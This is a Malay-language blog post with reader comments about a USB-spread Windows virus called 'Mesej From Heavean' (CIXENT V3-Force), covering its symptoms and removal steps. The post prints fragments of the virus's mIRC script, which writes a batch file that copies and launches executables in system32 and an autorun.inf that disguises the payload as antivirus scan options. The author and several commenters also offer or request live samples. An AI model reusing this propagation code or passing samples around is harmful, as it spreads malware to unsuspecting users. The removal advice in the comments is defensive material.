Mesej From Heavean Virus !
Masih ingat dengan artikel sajak dari Heavean ? Sebenarnya ada cerita buruk disebalik sajak yang indah itu.Agak-agak anda apa cerita buruk yang saya maksudkan . Sebenarnya mesej from heavean adalah sejenis virus yang tergolong dalam kategori trojan , spyware mengikut pemerhatian saya.Kisah benar disebalik mesej from heavean
“Pada satu hari seorang kawan saya memberitahu komputer dia keluar satu mesej “Jeng ! Jeng ! Jeng ! Jeng” sebelum login ke windows.Saya tanya dia ” apa mesej yang keluar ?.Beliau menjawab mesej Jen ! Jeng ! Jeng lagi.”
Untuk lebih jelas saya pergi berjumpa beliau dan melihat sendiri mesej yang dimaksudkan.Setelah melihat komputer tersebut didapati komputer tersebut di serang sejenis virus.Saya sendiri tidak mengetahui nama virus tersebut.Mengikut permerhatian saya terdapat 3 identiti yang terselah pada virus tersebut :
Kesan daripada virus ini akan menyebabkan system registry tidak boleh di akses , disable task manager , control panel hilang , run hilang , search hilang , akan keluar mesej from heavean dalam bentuk command prompt , icon-icon yang terdapat taskbar hilang , nama drive akan ditukar kepada RoMeO A.K.A ILLS [CIXENT]. Cara virus ini beroperasi ia akan create satu foldernya sendiri dalam drive C yang akan di hidden.Folder tersebut mengadungi file script-script yang mengubah system windows.Yang menjadi masalah jika anda ingin view file atau folder yang hidden tidak akan dibenarkan.Buat masa sekarang saya belum dapat menyelesaikan masalah ini.Saya ada membaca dalam forum Kaspersky cara untuk mengatasinya namun masih tidak berjaya.Kalau anda ada cara untuk mengatasinya sila tinggalkan komen.
Antara Screenshot Bila Terkena Virus Jeng!Jeng!Jeng
Antara Kod atau Script Utama Virus Ini.
alias pathfinder {
write -c setupNT\pathfinder.bat @echo off
write setupNT\pathfinder.bat if exist c:\windows\system32\V3-Force.exe goto skip
write setupNT\pathfinder.bat if exist c:\windows\system32\remote.ini erase /f /q c:\windows\system32\remote.ini
write setupNT\pathfinder.bat xcopy /Y /h /r /q hell\RoMeO.exe c:\windows\system32
write setupNT\pathfinder.bat xcopy /Y /h /r /q hell\CipapLu.exe c:\windows\system32
write setupNT\pathfinder.bat xcopy /Y /h /r /q hell\mirc.ini c:\windows\system32
write setupNT\pathfinder.bat ren c:\windows\system32\RoMeO.exe V3-Force.exe
write setupNT\pathfinder.bat start c:\windows\system32\V3-Force.exe
write setupNT\pathfinder.bat :skip
write setupNT\pathfinder.bat exit
alias autorun {
write -c setupNT\autorun.inf [Autorun]
write setupNT\autorun.inf open=FuCkiNG.bat
write setupNT\autorun.inf shellexecute=fucking.bat
write setupNT\autorun.inf shell\Auto\command=fucking.bat
write setupNT\autorun.inf label=
write setupNT\autorun.inf Shell\Option1=Scan for Viruses
write setupNT\autorun.inf Shell\Option1\Command=FuCkiNG.bat
write setupNT\autorun.inf Shell\Option2=Scan with AVG
write setupNT\autorun.inf Shell\Option2\Command=FuCkiNG.bat
p/s : Khabar angin menceritakan virus ini dicipta oleh salah seorang pelajar UiTM.Betul atau tidak saya belum pasti.Jika anda ingin mencuba virus ini boleh hubungi saya untuk mendapatkannya.
Popularity: 24% [?]
wah..dah bersalin kulit…bagus2….bg putih lebih formal =)
melayubuntu’s last blog post..Linux dan Open Source terpinggir : Sumpahan apabila ia percuma?
Reply
Removing CIXENT Corp
OOo camginih nk remove CIXENT.V3.Force.LovePart.Small.vb nih.
Mula2 ngko kna pkai browser ganaih sekali abad ini yakni:
1.Download Google recommend Web browserFor more safe and stay far away virus, http://www.oral8.net/firefox/firefox.htm;
2.Ko carik antiv khas untuk virii tu AVENGER
download avenger: http://swandog46.geekstogo.com/avenger.zip
unpack and execute, choose input script manually, press the magnifier and input:
Files to delete:
C:\WINDOWS\system32\V3-Force.exe
C:\WINDOWS\system32\cipaplu.exe
C:\WINDOWS\system32\mycaption.reg
C:\WINDOWS\system32\butuhlu.bat
C:\WINDOWS\system32\forattrib.bat
C:\WINDOWS\system32\makedir.bat
press done and press the green lamp button, confirm the reboot. after the reboot delete the following registry key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\
CIXENT.V3.Force.LovePart.Small.vb Description:
CIXENT Corp [CIXENT.V3.Force.LovePart.Small.vb] virus
- copied V3-Force.exe in system32 folder..
- blocked all administration task
- popup with Jeng!!!Jeng!!!Jeng!!!Jeng!!!Jeng!!!Jeng!!!Jeng!!! x100 words during startup
etc.
Reply
Tp dia punya puisi awek cantekk wooo… terpegun rasa.. hak hak heheheh…
Reply
FuCkiNG.bat?
entah ble mase sesat dlm pendrive aku.
tapi ianya tak dapat menjahanamkan Ubuntuku
MakLaN’s last blog post..Negara Ini (1)
Reply
Dahsyat juga penangan virus ni yer….
hafez’s last blog post..Minyak Soya Vs. Minyak Sawit
Reply
Untuk dapatkan kembali registry, folder options, etc, kau carik software Remove Restriction Tool.
CypherHackz’s last blog post..Hadiah birthday aku, Kaspersky Internet Security
Reply
Salam, blog yang hebat!
Saya juga meminati virus dan program antivirus. Tak sangka ada blog ni. Thank You..
-Shueqry-
Shueqry’s last blog post..10 Tips Kejayaan Donald Trump - Part 9
Reply
Peh…dasyat tu…virus pun pandai bersajak…thanx 4 da info…thanx 4 da tips Budhuman
alFarabius’s last blog post..Mentaliti Graduan IT selepas Tamat Belajar - Kerja atau Sambung Belajar?
Reply
erm.. tak pernah lagi aku kene virus ni sbb aku sorg je yg pakai pc n internet kat umah berbanding kalo aku dok kat kolej n poli dulu. mmg besepah virus.
Reply
ni mesti mat jiwang yang baru clash ngan awek buat virus ni..
kui3..
Reply
antivirus dapat clean virus ini..yang masalahnya kita kena repair sendiri ler kerosakan windows.Kena guna tools…nanti saya akan kongsi tools yang diperlukan.
kita’s last blog post..Mesej From Heavean Virus !
Reply
waa, kongsiblog dah bersalin kulit ye…
nice look ^^
Muhammad Khairul’s last blog post..Betapa Pentingnya Backup!
Reply
wehh. send virus body kat aku maa. guna sdfix bleh clear bende nie and lepas tuh kene fix yg message login tuh guna dial-a-fix. virus nie yg tulis budak kat forum putera la. patutnya failed virus, tapi bleh tahan aa
Reply
ade cara nak ilangkan ke?
Reply
boleh baca komen yang budhuman cara untuk settlekan..kalau guna antivirus kasperky boleh remove n kena repair sendiri kerosakan tersebut dalam system registry
kita’s last blog post..Mesej From Heavean Virus !
Reply
apalah bebudak ni baru pandai sikit dah sibuk nak buat virus sendiri… menyusahkan orang betul…
am’s last blog post..Genuine Kan XP Anda
Reply
Yahooooo…..akhirnya ak berjaya clean virus ni…ikut aje step yg Budhuman bg.Lg satu utk remove jeng!! x100,pergi ke registry editor (regedit), ambik edit, find, taip aje cixent corp, n lpas jmpe registry key tu, buang aje registry key tu…klu x silap ade 2 registry key…Lpas tu restart blik system…time welcome wndows tu, gerenti jeng!! x100 tu x kuar dh…
Reply
Ak gune antivirus kaspersky 7 utk detect virus ni…
Reply
Virus jiwang neh bleh didetect ngn antivirus biasa. Janji kena update!
Reply
Kat ner nak dapatkan tempat untuk buka registry key yg nak dibuang? control panel and ,macam@ lagi dihalang untuk buka. 1 part aku dah hilagkan tapi yang jeng2 and nama drive masih ada.tq
Reply
macam maner nak buang bende tuu.. tak leh pon….
Reply
sesiape yg masih lagi mengalami masalh virus ni boleh masuk kat sini >> http://maniack.890m.com/wordpress/?p=40 untuk donlod removal dan analisis utk virus ni
Reply
CANTEK AH.. DAH ILANG PON SUME HAHAH….. TQ x100
Reply
ni org m’sia buat virus ni.. haha..
Reply
laa org kt sini kene attack dah…..asskum…aku br je kat sini…aku tau web ni pun dr geek team aku…asal MsG from HeAveN 2 dr aku punya anak buah….nk lawan toke kiranya…aku mewakili si pereka batch 2 mntak maap la…dia putus cinta la…kekasih di tebuk tupai…nk jadi cerita.. si pereka 2 nk balas dendam kat tupai 2 dgn bunuh laptoop si tupai…disuruhnye anak buahnya sebarkan kat latop tupai…tp si anak buah 2 salah guna pegi sebar ke merata…satu room aku kena jangkitan…klu nk tau pegi kat…ahh slesai la sendiri…mudah je…
Reply
o0o.. begitu ceritenye.. patutlh msg dier mcm org putus chenta je..
Reply
aku knal mamat yg buat ni.die tension sbb clash ngan awek die bdk poli.seb baik die bg command nk buang.tp dier nk upgrade plak.chekout command utk vbs
Reply
lagi satu virus kamikaze kit.virus jnis pe ni?MBR ke?apsal bios aku jd blur ngan transparent siap ade gif kucing lg.tlg2
Reply
utk remove virus ni….kau org kene ada (utk memudahkan delete) tune up utilities 2007 atau 2008… kau pegi kat registry editor manager dlm tune up tu dan tekan search….cari fail ni
C:\WINDOWS\system32\V3-Force.exe
C:\WINDOWS\system32\cipaplu.exe
C:\WINDOWS\system32\mycaption.reg
C:\WINDOWS\system32\butuhlu.bat
C:\WINDOWS\system32\forattrib.bat
C:\WINDOWS\system32\makedir.bat
pas tu delete laa..
cari yg ni plak
HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\
CIXENT.V3.Force.LovePart.Small.vb Description:
CIXENT Corp [CIXENT.V3.Force.LovePart.Small.vb] virus
delete ini benda …reboot pc anda…
kalau nk repair task manager danlain2 yg di sekat tu kena guna..
Remove Restriction Tool…bye
Reply
Woi!! X payah nak reka2 crite laa… Macam2… Tupai laa.. tebuk laa.. anak buah laa.. hape laa…
Korang x tau kepale ekor criter x payah nak sebar khabar angin mengarut2.. Bikin gua panas jee… Wa cau Lu… tunggu CIXENT V4-Force plak… Grrrr…
Reply
Woi!!!.. Dah r tu.. x payah nak reka2 crite.. Tebuk tupai laaa.. anak buah laaa… balas dendam laa… EEeee!!! Mengarut betul!!.. Kalau x tahu kepala ekor cerita sbenar x payah nak buat crite sendiri.. Bikin gua panas jeee!!! k r.. wa cau lu… tunggu CIXENT V4-Force….
Reply
keskeskes.. kalu dh ader v4 jgn lupe hantar aku sample dier
Reply
sial 2 kali dah aku dah kena virus ni.tension gila.terima kasih maniack.ilang dah virus tu.simple je buang
Reply
aku dah dpt buang virus sial nie tp drive c dan d tetap ada nama romeo lg,mcm mane nk ilangkan?
Reply
V4-Force x pakai BATCH…
Reply
izani kau cuba klik kat drive c lepas tu pilih rename lepas tu padam .kemuadian biar dia ruang tu kosong dan klik.lepas tu jadi normal balik.drive D pun sama gak.Aku buat ok ja.
Reply
hemm..saya nak minta awak send virus tuh kat emel saya..saya nak test n try get a solution..
Reply
saya pun nak sample virus ni jga..nak wat kajian sikit..sape2 leh bagi ??? plz..
Reply